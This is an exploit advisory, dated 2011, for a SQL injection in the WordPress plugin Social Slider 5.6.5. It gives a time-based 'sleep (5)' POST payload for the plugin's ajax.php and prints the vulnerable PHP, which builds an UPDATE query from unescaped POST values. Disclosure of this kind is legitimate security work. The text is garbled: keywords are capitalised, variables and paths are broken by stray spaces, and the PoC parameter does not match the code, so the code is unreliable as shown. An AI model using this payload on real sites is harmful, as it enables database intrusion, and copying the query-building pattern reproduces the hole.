# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav. stampar (at) gmail.com @ stamparm)
# Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip
# Version: 5.6.5 (tested)
---------------
PoC (POST data)
---------------
Http://www.bkjia.com/wp-content/plugins/social-slider-2/ajax. php
Action = ZapiszPozycje & rA [] = 1 and sleep (5)
---------------
Vulnerable code
---------------
<? Php
Require_once (dirname (_ FILE _). '/.../../wp-config.php ');
Global $ wpdb, $ table_prefix;
$ SocialSliderArray =$ _ POST ['a'];
If (mysql_real_escape_string ($ _ POST ['action']) = "ZapiszPozycje ")
{
$ LC = 1;
Foreach ($ SocialSliderArray as $ recordIDValue)
{
$ Query = "UPDATE". $ table_prefix. "socialslider SET lp =". $ lC. "WHERE id =". $ recordIDValue;
Mysql_query ($ query );
$ LC = $ lC + 1;
}
}
?>